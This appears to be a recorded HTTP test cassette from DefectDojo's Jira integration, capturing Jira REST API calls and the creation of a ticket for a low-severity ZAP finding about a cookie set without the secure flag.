https://defectdojo.atlassian.net/rest/api/2/issue/10610 + response: + body: + string: !!binary | + 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 + headers: + ATL-TraceId: + - ef5b4cf7094ecf14 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:00 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 94f84062-dfc4-4499-9460-cbf908894f6b + x-envoy-upstream-service-time: + - '172' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/serverInfo + response: + body: + string: !!binary | + H4sIAAAAAAAAA0yPQU/DMAyF/0uutJ2TJt2aG4IDIDSQ2p0QQmnriKI0qZoUaZr230nExLj52d/z + s0+kUx4PiyGSfIYwe7nZDKixD4P7coUKRnk/KltYDCQj37j40dkIUwBaQAF5s799bR5e2ut0v05d + rIh8S1AGGbxnZMDZuOOENrTHGeOCO+PWIZq6dTTDr4XIZBD80rxXIYEMGM2B5axqKZVsK0teAMAN + RDj6PS4xtx2nK1vmQFsGkgsZj+Ql+2P76dFqF0FeCbHVVGtEvqtrrXjSqOiWVWLHomCir6v6X0Aw + KeFpXBRJ72i1mvDsepXaJ2IuFUH7cWjI+fwDAAD//wMAgwTQ01oBAAA= + headers: + ATL-TraceId: + - 03c8d7c82e875e82 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:01 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 02b0ef99-24f8-476a-8756-0a7e9ef46c20 + x-envoy-upstream-service-time: + - '28' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/field + response: + body: + string: !!binary | + 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 + wKGuu74AAAD//wMANYTZQH1HAAA= + headers: + ATL-TraceId: + - 27b7fdb2cf5a4d10 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:01 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 4d92114e-4af4-410c-a54b-08cb80914b1b + x-envoy-upstream-service-time: + - '54' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/issue/createmeta?projectKeys=NTEST&issuetypeNames=Task&expand=projects.issuetypes.fields + response: + body: + string: !!binary | + H4sIAAAAAAAAA+xWS0/jMBD+K1EOnCpCS8WiShVCy66EdoWQKFwQB5NMqKljBz/adBH/fT2JE7vQ + ZbPlsgd6qWcyj28envFzDFVJeBZP4lKKR0i1igf+OLl99gJUKQN6XQKKKGC55c21LtUkSTLIrUIm + HsU+0YwoRQnf56ATCUonpKTJKHFWk+GB/VkTFI22xALWlrqYfbuaWYqTAix5zanW1gA6JEuiibyW + zKJ6jsfH1fi4j38FqZHQ+m6MnJQ0m9aO9xrGOZLjgy/WzWhcjcY7G1b0F0xVQRjbU+7/HV/Do2p4 + 9DFfVevMHd7xdjiqDkcf81ZARk1hvbnDH729DMJuwS7aoV86C3XHjMKOQSIDlUpaaiq45Z5GdQIG + UUaVpjzVUUkhhUjk0UrIxT5qp4Lb/umDwqVgSWG1Jf4g2MPhsSNnFui0g+x7eEbUwlKGa0m4YkRD + drHxRZl7jadJTpiCgb9vOQWWYeu7g217ZYqCyDUeJTwZKsEKammsmkrnUBD8UvufxEpLyh/QwVpp + KJDjtF86cFeO096/VmIQz4k6g5wYpm8IM9ChEyVIgjnHstqq6vguLHYvZGGWOnCe6eGdIy/CzHYI + Q91eGO/s6GBMrCCrhT67cVvPtTbiSW3kBWuaiqIUHDiugbCoTuVNVYmUBDuH2npaFa8fVjkw6sv8 + 1TPbMgdyPesckyxDT4D+JBRiCfGW2mNkRGuSzguEtlNkgX4QWsD1oZ2Gok1oG9q9QkPMG/3VB/Tb + 6x+a8AjPAm4LMZTsibEbBW5t9BoErWwAsmV5gJedUAPOK/0DsLeNsNMQ+NgTxmnj3fzRjFuR6xWR + 9RykRcmonfS+pJ8vnm2+/tcXTz0z64nLKF/sODMD/derseH6a/HT0pBF9Yr0c3PDADFa4GxloKHn + qnm98JKSpguQJzY/0k4sdxdt1HtqLlZX5h4XyiXBb1O85CFbNRynWgO1bT/lxlbtyYBcT3vfYZzt + mN+cVjcgVcPeJcHLRjvMbmjTp/c7rSIn7LMbivaF3iykZjn9ZS3ZMjxwgH6RGQUyDKPTDpZPy+pW + j2ds9sZvAAAA//+8l81uwjAMx19l6p1kHeUyaeI0aQf2CGgKKEoyAUVNGezQd5+dL1rSTe1ScXUT + +5fG8d8emxsYnFpvbLPj8IBYtZVL94BeTA0ce8dXAVFlpeqbJve33xBWdzTE2doiEpZ5FQmGCM+q + VQ9dfG//VBEbm+aYmcP7QLVngmuKO7R3osAglZDgnegv1Ht34jdrxAhGpOBnpMGalnca2JjUYz4l + Y86nwbT1vgv6bmwedZ6MWkyDChnZ5VyVZw9ZJEMuJoOMUnRlbB51kTVr7HPbLzEN/Z6pAKVme9J1 + uTfD+gf0CHkxrIKxAxYhuzkzkw85fl+UJqLi/CDLI9Qh8qkq9izkjIMez1DfwxY7tEG0a7F7hUUP + 2B9kYZyK0HrK3p9Vecc23DaiA050I7rxKOK8tboZa/C87nuaTOXkkVpHVJ8EXG29HClJfSNlg53e + uvkBAAD//wMAc91BljkVAAA= + headers: + ATL-TraceId: + - fec62189e8c73a4e + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:01 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - d14f3ccb-1503-4503-9eb9-e03dc055ad77 + x-envoy-upstream-service-time: + - '85' + status: + code: 200 + message: OK +- request: + body: '{"fields": {"project": {"key": "NTEST"}, "summary": "Zap2: Cookie Without + Secure Flag", "description": "\n\n\n\n\n\n*Title*: [Zap2: Cookie Without Secure + Flag|http://localhost:8080/finding/386]\n\n*Defect Dojo link:* http://localhost:8080/finding/386\n\n*Severity:* + Low \n\n*CWE:* Unknown\n\n\n\n*CVE:* Unknown\n\n\n*Product/Engagement/Test:* + [Security How-to|http://localhost:8080/product/2] / [weekly engagement|http://localhost:8080/engagement/3] + / [ZAP Scan|http://localhost:8080/test/111]\n\n*Branch/Tag:* None\n\n*BuildID:* + None\n\n*Commit hash:* None\n\n*Systems/Endpoints*: \n\n* https://mainsite.com:443\n* + https://mainsite.com\n* https://mainsite.com/dashboard\n\n*Description*:\nA + cookie has been set without the secure flag, which means that the cookie can + be accessed via unencrypted connections.\n\nReference: http://www.owasp.org/index.php/Testing_for_cookies_attributes_(OWASP-SM-002)\n\nURL: + https://mainsite.com/dashboard\nMethod: GET\nParameter: opvc\nEvidence: Set-Cookie: + opvc\n\nURL: https://mainsite.com/dashboard\nMethod: GET\nParameter: dmid\nEvidence: + Set-Cookie: dmid\n\nURL: https://mainsite.com\nMethod: GET\nParameter: sitevisitscookie\nEvidence: + Set-Cookie: sitevisitscookie\n\n\n*Mitigation*:\nWhenever a cookie contains + sensitive information or is a session token, then it should always be passed + using an encrypted channel. Ensure that the secure flag is set for cookies containing + such sensitive information.\n\n*Impact*:\nNo impact provided\n\n*Steps to reproduce*:\nNone\n\n*References*:\nCWE-614\nWASC-13\n\n\n*Defect + Dojo ID:* 386\n\n*Reporter:* [(admin) ()|mailto:]\n", "issuetype": {"name": + "Task"}, "priority": {"name": "Low"}}}' + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Length: + - '1673' + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: POST + uri: https://defectdojo.atlassian.net/rest/api/2/issue + response: + body: + string: '{"id":"10611","key":"NTEST-459","self":"https://defectdojo.atlassian.net/rest/api/2/issue/10611"}' + headers: + ATL-TraceId: + - 7a745b17a67486d7 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:02 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 7e8f6c04-4df1-44e8-af62-4366c2eb7b38 + x-envoy-upstream-service-time: + - '449' + status: + code: 201 + message: Created +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/issue/NTEST-459 + response: + body: + string: !!binary | + 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 + 